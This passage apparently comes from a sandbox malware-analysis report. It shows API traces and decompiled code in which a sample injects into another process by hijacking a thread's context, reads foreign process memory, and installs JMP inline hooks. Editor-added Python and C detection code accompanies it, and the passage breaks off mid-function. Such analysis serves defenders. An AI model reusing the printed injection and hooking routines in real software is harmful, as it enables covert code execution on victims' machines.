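• WriteProcessMemory.KERNEL32(?,?,?,00000318,00AB2EC6,?,?,00000000,?,00000008,00000000), ref: 00AB2FB1
• NtSetContextThread.NTDLL ref: 00AB2FC6
• ResumeThread.KERNEL32(?,?,00000000,?,00000008,00000000), ref: 00AB2FD7
• Sleep.KERNEL32(000001F4,?,00000000,?,00000008,00000000), ref: 00AB2FE2
• SuspendThread.KERNEL32(?,?,00000000,?,00000008,00000000), ref: 00AB2FEB
• GetLastError.KERNEL32(?,00000008,00000000), ref: 00AB2FF3
"""

# Constructed: an ordinary in-process allocation plus a local thread, no remote writes.
BENIGN_TRACE = """\
• VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 00401000
• memcpy.NTDLL(?,?,00001000), ref: 00401010
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00401020
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # None where the sandbox could not recover the value ("?")
    ref: str                    # address of the call site


def parse_trace(text: str) -> List[Call]:
    """Turn the report's bullet lines into Call records; unparseable lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref")))
    return calls


def _is_rwx_remote_alloc(c: Call) -> bool:
    # VirtualAllocEx(hProcess, lpAddress, dwSize, flAllocationType, flProtect)
    return c.api == "VirtualAllocEx" and len(c.args) > 4 and c.args[4] == PAGE_EXECUTE_READWRITE


# Ordered stages of a context hijack; each stage is a label plus a predicate on one call.
STAGES = [
    ("rwx allocation in another process", _is_rwx_remote_alloc),
    ("write into another process", lambda c: c.api in {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("thread context overwritten", lambda c: c.api in {"NtSetContextThread", "SetThreadContext", "Wow64SetThreadContext"}),
    ("thread resumed", lambda c: c.api in {"ResumeThread", "NtResumeThread"}),
]


def detect_thread_hijack(calls: List[Call]) -> Optional[List[Call]]:
    """Return the calls that complete the hijack sequence, in order, else None."""
    evidence: List[Call] = []
    stage = 0
    for c in calls:
        if STAGES[stage][1](c):
            evidence.append(c)
            stage += 1
            if stage == len(STAGES):
                return evidence
    return None


if __name__ == "__main__":
    for name, text in (("E00AB2ED8", TRACE), ("benign", BENIGN_TRACE)):
        hit = detect_thread_hijack(parse_trace(text))
        if hit:
            print(f"{name}: thread-context hijack")
            for (label, _), c in zip(STAGES, hit):
                print(f"  {label}: {c.api} at {c.ref}")
        else:
            print(f"{name}: no hijack pattern")
```

The stage predicates deliberately accept the Nt* and Wow64 aliases so that a sample calling the native functions directly, as this one does for the context calls, still matches; the protection check on the first stage keeps ordinary read-write remote allocations from starting the sequence.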

                                          APIs
                                          • memset.NTDLL ref: 00AB2EF2
                                          • VirtualAllocEx.KERNEL32(?,00000000,00000318,00003000,00000040,?,00000008,00000000), ref: 00AB2F16
                                          • NtGetContextThread.NTDLL ref: 00AB2F31
                                          • memcpy.NTDLL(?,00AB37F6,00000100,00000000,?,00000008,00000000), ref: 00AB2F77
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000318,00AB2EC6,?,?,00000000,?,00000008,00000000), ref: 00AB2FB1
                                          • NtSetContextThread.NTDLL ref: 00AB2FC6
                                          • ResumeThread.KERNEL32(?,?,00000000,?,00000008,00000000), ref: 00AB2FD7
                                          • Sleep.KERNEL32(000001F4,?,00000000,?,00000008,00000000), ref: 00AB2FE2
                                          • SuspendThread.KERNEL32(?,?,00000000,?,00000008,00000000), ref: 00AB2FEB
                                          • GetLastError.KERNEL32(?,00000008,00000000), ref: 00AB2FF3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
• Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
• Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$Context$AllocErrorLastMemoryProcessResumeSleepSuspendVirtualWritememcpymemset
                                          • String ID:
                                          • API String ID: 1761926231-0
                                          • Opcode ID: 5828b25aa73a5393a7ee00249612fd235b91f856baf389ba8bf59883d0fbc071
                                          • Instruction ID: 91182f3a4e3adee13bd4075468ea4d9e493f5a687a270d7516f703345eebe2d3
                                          • Opcode Fuzzy Hash: 5828b25aa73a5393a7ee00249612fd235b91f856baf389ba8bf59883d0fbc071
                                          • Instruction Fuzzy Hash: D3313871A40619AFDB11DFA4DC89BEA7BB8FF08340F004266F9089A166D770DA61CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00AB2B39(void* _a4) {
                                          				long _v8;
                                          				void* _v28;
                                          				char _v32;
                                          				void _v512;
                                          				void _v520;
                                          				char* _t13;
                                          				int _t19;
                                          
                                          				_t19 = 0;
                                          				memset( &_v520, 0, 0x1e8);
                                          				_t13 =  &_v32;
                                          				__imp__ZwQueryInformationProcess(_a4, 0, _t13, 0x18,  &_v8);
                                          				if(_t13 >= 0) {
                                          					ReadProcessMemory(_a4, _v28,  &_v520, 0x1e8,  &_v8);
                                          					_t19 =  !=  ? _v512 : 0;
                                          				}
                                          				return _t19;
			}

                                          APIs
                                          • memset.NTDLL ref: 00AB2B54
                                          • ZwQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,?,?,00000000,00000000), ref: 00AB2B6A
                                          • ReadProcessMemory.KERNEL32(00000000,00AB1D0E,?,000001E8,?,?,00000000,00000000), ref: 00AB2B86
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
• Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
• Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$InformationMemoryQueryReadmemset
                                          • String ID:
                                          • API String ID: 248391229-0
                                          • Opcode ID: b32156eebb5d02aca436d5dc672656c7fdae7d490184b5d4378048edd44c417d
                                          • Instruction ID: 1cf492b8aa2cc59f7b2d1c92512899088b5626e191195f2126e4d0d8a77c7b53
                                          • Opcode Fuzzy Hash: b32156eebb5d02aca436d5dc672656c7fdae7d490184b5d4378048edd44c417d
                                          • Instruction Fuzzy Hash: 45F0F47290012DBBDB10EA95DD09EEFBBBCEF45750F4041A1BE08D2051D7309A159BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00AB126D(long _a4) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				short* _v32;
                                          				void _v36;
                                          				void* _t57;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				signed int _t62;
                                          				void* _t63;
                                          				signed int* _t68;
                                          				intOrPtr* _t69;
                                          				intOrPtr* _t71;
                                          				intOrPtr _t72;
                                          				intOrPtr _t75;
                                          				void* _t76;
                                          				signed int _t77;
                                          				void* _t78;
                                          				void _t80;
                                          				signed int _t81;
                                          				signed int _t84;
                                          				signed int _t86;
                                          				short* _t87;
                                          				void* _t89;
                                          				signed int* _t90;
                                          				long _t91;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				signed int _t100;
                                          				signed int _t102;
                                          				void* _t104;
                                          				long _t108;
                                          				signed int _t110;
                                          
                                          				_t108 = _a4;
                                          				_t76 =  *(_t108 + 8);
                                          				if((_t76 & 0x00000003) != 0) {
                                          					L3:
                                          					return 0;
                                          				}
                                          				_a4 =  *[fs:0x4];
                                          				_v8 =  *[fs:0x8];
                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                          					_t102 =  *(_t108 + 0xc);
                                          					__eflags = _t102 - 0xffffffff;
                                          					if(_t102 != 0xffffffff) {
                                          						_t91 = 0;
                                          						__eflags = 0;
                                          						_a4 = 0;
                                          						_t57 = _t76;
                                          						do {
                                          							_t80 =  *_t57;
                                          							__eflags = _t80 - 0xffffffff;
                                          							if(_t80 == 0xffffffff) {
                                          								goto L9;
                                          							}
                                          							__eflags = _t80 - _t91;
                                          							if(_t80 >= _t91) {
                                          								L20:
                                          								_t63 = 0;
                                          								L60:
                                          								return _t63;
                                          							}
                                          							L9:
                                          							__eflags =  *(_t57 + 4);
                                          							if( *(_t57 + 4) != 0) {
                                          								_t12 =  &_a4;
                                          								 *_t12 = _a4 + 1;
                                          								__eflags =  *_t12;
                                          							}
                                          							_t91 = _t91 + 1;
                                          							_t57 = _t57 + 0xc;
                                          							__eflags = _t91 - _t102;
                                          						} while (_t91 <= _t102);
                                          						__eflags = _a4;
                                          						if(_a4 == 0) {
                                          							L15:
                                          							_t81 =  *0xb16da0; // 0x0
                                          							_t110 = _t76 & 0xfffff000;
                                          							_t58 = 0;
                                          							__eflags = _t81;
                                          							if(_t81 <= 0) {
                                          								L18:
                                          								_t104 = _t102 | 0xffffffff;
                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                          								__eflags = _t61;
                                          								if(_t61 < 0) {
                                          									_t62 = 0;
                                          									__eflags = 0;
                                          								} else {
                                          									_t62 = _a4;
                                          								}
                                          								__eflags = _t62;
                                          								if(_t62 == 0) {
                                          									L59:
                                          									_t63 = _t104;
                                          									goto L60;
                                          								} else {
                                          									__eflags = _v12 - 0x1000000;
                                          									if(_v12 != 0x1000000) {
                                          										goto L59;
                                          									}
                                          									__eflags = _v16 & 0x000000cc;
                                          									if((_v16 & 0x000000cc) == 0) {
                                          										L46:
                                          										_t63 = 1;
                                          										 *0xb16de8 = 1;
                                          										__eflags =  *0xb16de8;
                                          										if( *0xb16de8 != 0) {
                                          											goto L60;
                                          										}
                                          										_t84 =  *0xb16da0; // 0x0
                                          										__eflags = _t84;
                                          										_t93 = _t84;
                                          										if(_t84 <= 0) {
                                          											L51:
                                          											__eflags = _t93;
                                          											if(_t93 != 0) {
                                          												L58:
                                          												 *0xb16de8 = 0;
                                          												goto L5;
                                          											}
                                          											_t77 = 0xf;
                                          											__eflags = _t84 - _t77;
                                          											if(_t84 <= _t77) {
                                          												_t77 = _t84;
                                          											}
                                          											_t94 = 0;
                                          											__eflags = _t77;
                                          											if(_t77 < 0) {
                                          												L56:
                                          												__eflags = _t84 - 0x10;
                                          												if(_t84 < 0x10) {
                                          													_t86 = _t84 + 1;
                                          													__eflags = _t86;
                                          													 *0xb16da0 = _t86;
                                          												}
                                          												goto L58;
                                          											} else {
                                          												do {
                                          													_t68 = 0xb16da8 + _t94 * 4;
                                          													_t94 = _t94 + 1;
                                          													__eflags = _t94 - _t77;
                                          													 *_t68 = _t110;
                                          													_t110 =  *_t68;
                                          												} while (_t94 <= _t77);
                                          												goto L56;
                                          											}
                                          										}
                                          										_t69 = 0xb16da4 + _t84 * 4;
                                          										while(1) {
                                          											__eflags =  *_t69 - _t110;
                                          											if( *_t69 == _t110) {
                                          												goto L51;
                                          											}
                                          											_t93 = _t93 - 1;
                                          											_t69 = _t69 - 4;
                                          											__eflags = _t93;
                                          											if(_t93 > 0) {
                                          												continue;
                                          											}
                                          											goto L51;
                                          										}
                                          										goto L51;
                                          									}
                                          									_t87 = _v32;
                                          									__eflags =  *_t87 - 0x5a4d;
                                          									if( *_t87 != 0x5a4d) {
                                          										goto L59;
                                          									}
                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                          									__eflags =  *_t71 - 0x4550;
                                          									if( *_t71 != 0x4550) {
                                          										goto L59;
                                          									}
                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                          										goto L59;
                                          									}
                                          									_t78 = _t76 - _t87;
                                          									__eflags =  *((short*)(_t71 + 6));
                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                          										goto L59;
                                          									}
                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                          									__eflags = _t78 - _t72;
                                          									if(_t78 < _t72) {
                                          										goto L46;
                                          									}
                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                          										goto L46;
                                          									}
                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                          										goto L20;
                                          									}
                                          									goto L46;
                                          								}
                                          							} else {
                                          								goto L16;
                                          							}
                                          							while(1) {
                                          								L16:
                                          								__eflags =  *((intOrPtr*)(0xb16da8 + _t58 * 4)) - _t110;
                                          								if( *((intOrPtr*)(0xb16da8 + _t58 * 4)) == _t110) {
                                          									break;
                                          								}
                                          								_t58 = _t58 + 1;
                                          								__eflags = _t58 - _t81;
                                          								if(_t58 < _t81) {
                                          									continue;
                                          								}
                                          								goto L18;
                                          							}
                                          							__eflags = _t58;
                                          							if(_t58 <= 0) {
                                          								goto L5;
                                          							}
                                          							 *0xb16de8 = 1;
                                          							__eflags =  *0xb16de8;
                                          							if( *0xb16de8 != 0) {
                                          								goto L5;
                                          							}
                                          							__eflags =  *((intOrPtr*)(0xb16da8 + _t58 * 4)) - _t110;
                                          							if( *((intOrPtr*)(0xb16da8 + _t58 * 4)) == _t110) {
                                          								L32:
                                          								_t100 = 0;
                                          								__eflags = _t58;
                                          								if(_t58 < 0) {
                                          									L34:
                                          									 *0xb16de8 = 0;
                                          									goto L5;
                                          								} else {
                                          									goto L33;
                                          								}
                                          								do {
                                          									L33:
                                          									_t90 = 0xb16da8 + _t100 * 4;
                                          									_t100 = _t100 + 1;
                                          									__eflags = _t100 - _t58;
                                          									 *_t90 = _t110;
                                          									_t110 =  *_t90;
                                          								} while (_t100 <= _t58);
                                          								goto L34;
                                          							}
                                          							_t25 = _t81 - 1; // -1
                                          							_t58 = _t25;
                                          							__eflags = _t58;
                                          							if(_t58 < 0) {
                                          								L28:
                                          								__eflags = _t81 - 0x10;
                                          								if(_t81 < 0x10) {
                                          									_t81 = _t81 + 1;
                                          									__eflags = _t81;
                                          									 *0xb16da0 = _t81;
                                          								}
                                          								_t28 = _t81 - 1; // 0x0
                                          								_t58 = _t28;
                                          								goto L32;
                                          							} else {
                                          								goto L25;
                                          							}
                                          							while(1) {
                                          								L25:
                                          								__eflags =  *((intOrPtr*)(0xb16da8 + _t58 * 4)) - _t110;
                                          								if( *((intOrPtr*)(0xb16da8 + _t58 * 4)) == _t110) {
                                          									break;
                                          								}
                                          								_t58 = _t58 - 1;
                                          								__eflags = _t58;
                                          								if(_t58 >= 0) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							__eflags = _t58;
                                          							if(__eflags >= 0) {
                                          								if(__eflags == 0) {
                                          									goto L34;
                                          								}
                                          								goto L32;
                                          							}
                                          							goto L28;
                                          						}
                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                          						__eflags = _t75 - _v8;
                                          						if(_t75 < _v8) {
                                          							goto L20;
                                          						}
                                          						__eflags = _t75 - _t108;
                                          						if(_t75 >= _t108) {
                                          							goto L20;
                                          						}
                                          						goto L15;
                                          					}
                                          					L5:
                                          					_t63 = 1;
                                          					goto L60;
                                          				} else {
                                          					goto L3;
                                          				}
			}
                                          0x00ab143d
                                          0x00ab143f
                                          0x00000000
                                          0x00000000
                                          0x00ab1441
                                          0x00ab1442
                                          0x00ab1445
                                          0x00ab1447
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab1447
                                          0x00000000
                                          0x00ab143d
                                          0x00ab13c0
                                          0x00ab13c3
                                          0x00ab13c8
                                          0x00000000
                                          0x00000000
                                          0x00ab13d1
                                          0x00ab13d3
                                          0x00ab13d9
                                          0x00000000
                                          0x00000000
                                          0x00ab13df
                                          0x00ab13e5
                                          0x00000000
                                          0x00000000
                                          0x00ab13eb
                                          0x00ab13ed
                                          0x00ab13f6
                                          0x00ab13fa
                                          0x00000000
                                          0x00000000
                                          0x00ab1400
                                          0x00ab1403
                                          0x00ab1405
                                          0x00000000
                                          0x00000000
                                          0x00ab140c
                                          0x00ab140e
                                          0x00000000
                                          0x00000000
                                          0x00ab1410
                                          0x00ab1414
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab1414
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab12ff
                                          0x00ab12ff
                                          0x00ab12ff
                                          0x00ab1306
                                          0x00000000
                                          0x00000000
                                          0x00ab1308
                                          0x00ab1309
                                          0x00ab130b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab130b
                                          0x00ab1333
                                          0x00ab1335
                                          0x00000000
                                          0x00000000
                                          0x00ab1345
                                          0x00ab1347
                                          0x00ab1349
                                          0x00000000
                                          0x00000000
                                          0x00ab134f
                                          0x00ab1356
                                          0x00ab1382
                                          0x00ab1382
                                          0x00ab1384
                                          0x00ab1386
                                          0x00ab139a
                                          0x00ab139c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab1388
                                          0x00ab1388
                                          0x00ab1388
                                          0x00ab1391
                                          0x00ab1392
                                          0x00ab1394
                                          0x00ab1396
                                          0x00ab1396
                                          0x00000000
                                          0x00ab1388
                                          0x00ab1358
                                          0x00ab1358
                                          0x00ab135b
                                          0x00ab135d
                                          0x00ab136f
                                          0x00ab136f
                                          0x00ab1372
                                          0x00ab1374
                                          0x00ab1374
                                          0x00ab1375
                                          0x00ab1375
                                          0x00ab137b
                                          0x00ab137b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab135f
                                          0x00ab135f
                                          0x00ab135f
                                          0x00ab1366
                                          0x00000000
                                          0x00000000
                                          0x00ab1368
                                          0x00ab1368
                                          0x00ab1369
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab1369
                                          0x00ab136b
                                          0x00ab136d
                                          0x00ab1380
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab1380
                                          0x00000000
                                          0x00ab136d
                                          0x00ab12df
                                          0x00ab12e2
                                          0x00ab12e5
                                          0x00000000
                                          0x00000000
                                          0x00ab12e7
                                          0x00ab12e9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ab12e9
                                          0x00ab12ae
                                          0x00ab12b0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00AB131E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryQueryVirtual
                                          • String ID:
                                          • API String ID: 2850889275-0
                                          • Opcode ID: 5898f156342baf0ef7728da5c308f9ef8fc76572020d9f9092720e4db431aa33
                                          • Instruction ID: f77f2597bdd754fbc148f7b25b7a6180117400442e724dc81a9ec3e556dfae4c
                                          • Opcode Fuzzy Hash: 5898f156342baf0ef7728da5c308f9ef8fc76572020d9f9092720e4db431aa33
                                          • Instruction Fuzzy Hash: 4A61DE70B146029FDB69CF29D8A06E937EDEF85314BE88578D816CB692E730DC42C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Offset: 00AB6000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ba96f6711df27de8cabc8e3fbf4f60924835705c72396694c496dac698528ab
                                          • Instruction ID: 9e9e5f1143de9250f5e13452191d430d532627a1ee20b707e43e2a8692606009
                                          • Opcode Fuzzy Hash: 6ba96f6711df27de8cabc8e3fbf4f60924835705c72396694c496dac698528ab
                                          • Instruction Fuzzy Hash: CD01D271900320AFE710CF999D89B9ABBA8FF04350F20812AFA05DB280DBB158818B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			// Hook installer. Arguments (read through the frame pointer _t90): +8 a lookup
                                          			// descriptor (flag at +4, name pointer at +8, 16-bit ordinal at +0xc), +0xc the
                                          			// module base (_t87), +0x10 an argument passed on to E00AB3802, +0x14 a hook
                                          			// record (_t89) that is filled in and queued. The 4-byte slot that gets patched
                                          			// holds a module-relative RVA (the base is added and subtracted around every
                                          			// access), which is consistent with an entry of the module's export address table.
                                          			E00AB3B9F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          				long _t49;
                                          				void* _t56;
                                          				intOrPtr _t61;
                                          				long _t70;
                                          				void* _t74;
                                          				void* _t83;
                                          				void* _t84;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				void* _t90;
                                          
                                          				_push(0x1c);
                                          				_push(0xab5488);
                                          				E00AB1000(__ebx, __edi, __esi);              // compiler prologue: exception frame, try-level at [ebp-4]
                                          				 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
                                          				_t47 =  *((intOrPtr*)(_t90 + 8));
                                          				_t87 =  *((intOrPtr*)(_t90 + 0xc));
                                          				_t94 =  *(_t47 + 4) & 0x00000001;
                                          				// Descriptor flag bit 0 selects the lookup: by 16-bit ordinal when set, by name otherwise.
                                          				if(( *(_t47 + 4) & 0x00000001) == 0) {
                                          					_t9 = _t47 + 8; // 0x2
                                          					_t48 = E00AB414A(__ebx, __eflags, _t87,  *_t9);
                                          				} else {
                                          					_t8 = _t47 + 0xc; // 0xb1681c
                                          					_t48 = E00AB41D0(_t94, _t87,  *_t8 & 0x0000ffff);
                                          				}
                                          				_t74 = _t48;                                 // address of the 4-byte RVA slot, or 0 if not found
                                          				if(_t74 == 0) {
                                          					_t49 = 2;                                // status 2 (the Win32 value of ERROR_FILE_NOT_FOUND)
                                          					goto L12;
                                          				} else {
                                          					 *(_t90 - 0x24) =  *(_t90 - 0x24) & 0x00000000;
                                          					// 0x40 = PAGE_EXECUTE_READWRITE; the slot's old protection is saved at [ebp-0x24].
                                          					if(VirtualProtect(_t74, 4, 0x40, _t90 - 0x24) == 0) {
                                          						_t49 = GetLastError();
                                          						goto L12;
                                          					} else {
                                          						_t89 =  *((intOrPtr*)(_t90 + 0x14));
                                          						_t78 =  *((intOrPtr*)(_t90 + 8));
                                          						 *((intOrPtr*)(_t89 + 0x18)) =  *((intOrPtr*)(_t90 + 8));   // record+0x18: descriptor
                                          						 *((intOrPtr*)(_t89 + 8)) =  *_t74 + _t87;                  // record+0x08: target VA = RVA + base
                                          						 *(_t89 + 0xc) = _t74;                                       // record+0x0c: slot address
                                          						 *(_t89 + 0x10) =  *_t74;                                    // record+0x10: original RVA
                                          						_t49 = E00AB3802( *((intOrPtr*)(_t90 + 8)), _t87,  *((intOrPtr*)(_t90 + 0x10)), _t89);
                                          						 *(_t90 - 0x1c) = _t49;
                                          						if(_t49 == 1) {                          // 1 means: go ahead with the inline patch
                                          							_t21 = _t89 + 8; // 0x55c35d5e
                                          							_t56 = E00AB3934(_t78, _t87,  *_t21);    // code address that receives the 5-byte patch (body not shown)
                                          							 *(_t90 - 0x28) = _t56;
                                          							if(_t56 != 0 && VirtualProtect(_t56, 5, 0x40, _t90 - 0x20) != 0) {
                                          								_t24 = _t89 + 0x14; // 0x2369f045
                                          								_t83 =  *(_t90 - 0x28);
                                          								// 5-byte inline hook: E9 <rel32> with rel32 = destination - (patch address + 5).
                                          								// record+0x14 holds the destination here and is then overwritten with the patch address.
                                          								 *((intOrPtr*)(_t83 + 1)) =  *_t24 - _t83 - 5;
                                          								 *_t83 = 0xe9;
                                          								 *(_t89 + 0x14) = _t83;
                                          								 *( *((intOrPtr*)(_t90 + 8)) + 0x14) = _t83;
                                          								_t84 = 0x20;                                         // PAGE_EXECUTE_READ
                                          								// The decompiler dropped the condition of this ternary; the effect is to pick
                                          								// either PAGE_EXECUTE_READ or the old protection saved at [ebp-0x20].
                                          								_t70 =  !=  ? _t84 :  *(_t90 - 0x20);
                                          								 *(_t90 - 0x20) = _t70;
                                          								VirtualProtect(_t83, 5, _t70, _t90 - 0x20);          // make the patched bytes executable again
                                          							}
                                          							_t33 = _t89 + 0x14; // 0x2369f045
                                          							 *_t74 =  *_t33 - _t87;                                  // slot now holds the RVA of the patched location
                                          							VirtualProtect(_t74, 4,  *(_t90 - 0x24), _t90 - 0x24);  // restore the slot's old protection
                                          							 *(_t89 + 0x1c) =  *(_t89 + 0x1c) | 0x00000102;         // record flags
                                          							// Link the record at the head of a global doubly-linked list (head at 0xb16e38).
                                          							EnterCriticalSection(0xb16e20);
                                          							_t61 =  *0xb16e38; // 0x0
                                          							 *_t89 = _t61;
                                          							 *((intOrPtr*)(_t89 + 4)) = 0xb16e38;
                                          							 *((intOrPtr*)(_t61 + 4)) = _t89;
                                          							 *0xb16e38 = _t89;
                                          							LeaveCriticalSection(0xb16e20);
                                          							_t40 = _t89 + 0x10; // 0xc7c03314
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t90 + 8)) + 0x18)) =  *_t40 + _t87;  // descriptor+0x18: original target VA
                                          							_t49 = 0;                                               // success
                                          							L12:
                                          							 *(_t90 - 0x1c) = _t49;
                                          						}
                                          					}
                                          				}
                                          				 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
                                          				return E00AB103B(_t49);                      // compiler epilogue; the status in _t49 is the return value
                                          			}
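                                          Worked example, added by the editor and not code from the sample or from this report: E00AB3B9F above installs a classic 5-byte inline hook by writing 0xE9 (JMP rel32) at a code address followed by the displacement destination - (patch address + 5). The C below reproduces that arithmetic on a constructed byte buffer that stands in for a function prologue, then shows the inverse check an analyst or EDR runs over a loaded module: read the first byte of each export, decode the JMP if one is present, and flag a destination that falls outside the owning module. Every address (kModBase, kModSize, kFuncVa, kHookVa) is an assumption made for the example, and no memory protection is changed because the code only touches a local buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define JMP_REL32_OPCODE 0xE9u
#define JMP_REL32_LEN    5u

/* Install "jmp rel32" at `patch`, whose virtual address is patch_va, so that
 * execution continues at hook_va. Same arithmetic as the decompiled routine:
 * *(p+1) = destination - p - 5; *p = 0xE9. */
static void install_jmp_rel32(uint8_t *patch, uint32_t patch_va, uint32_t hook_va)
{
    int32_t disp = (int32_t)(hook_va - (patch_va + JMP_REL32_LEN));
    patch[0] = (uint8_t)JMP_REL32_OPCODE;
    memcpy(patch + 1, &disp, sizeof disp);   /* x86 is little-endian */
}

/* Detection side: if a function starts with 0xE9, recover where it jumps.
 * Returns 1 and writes *dest_va when a JMP rel32 is present, else 0. */
static int decode_jmp_rel32(const uint8_t *code, uint32_t code_va, uint32_t *dest_va)
{
    int32_t disp;
    if (code[0] != (uint8_t)JMP_REL32_OPCODE)
        return 0;
    memcpy(&disp, code + 1, sizeof disp);
    *dest_va = code_va + JMP_REL32_LEN + (uint32_t)disp;
    return 1;
}

/* A jump whose destination lies outside the module that owns the function is
 * the usual indicator of an inline hook planted by foreign code. */
static int jmp_leaves_module(uint32_t dest_va, uint32_t mod_base, uint32_t mod_size)
{
    return dest_va < mod_base || dest_va - mod_base >= mod_size;
}

/* Round trip on a scratch buffer: patch, then decode. Returns the decoded
 * destination, or 0 if the decoder did not see a JMP. */
static uint32_t jmp_roundtrip(uint32_t patch_va, uint32_t hook_va)
{
    uint8_t buf[JMP_REL32_LEN] = {0};
    uint32_t dest = 0;
    install_jmp_rel32(buf, patch_va, hook_va);
    return decode_jmp_rel32(buf, patch_va, &dest) ? dest : 0;
}

/* Constructed scenario (all addresses are assumptions for this example):
 * a victim export inside a module mapped at kModBase, redirected to code in
 * an unrelated region, as the sample's routine would do. */
static const uint32_t kModBase = 0x77E00000u;
static const uint32_t kModSize = 0x00100000u;
static const uint32_t kFuncVa  = 0x77E10000u;
static const uint32_t kHookVa  = 0x00AB2000u;

/* Returns 1 when the clean prologue is left alone and the hooked one is
 * flagged with the right destination; 0 on any miss or false positive. */
static int demo_detects_hook(void)
{
    /* Constructed hot-patchable prologue: mov edi,edi; push ebp; mov ebp,esp; sub esp,0x10 */
    uint8_t prologue[8] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10 };
    uint32_t dest = 0;

    if (decode_jmp_rel32(prologue, kFuncVa, &dest))
        return 0;                                /* clean code must not be flagged */

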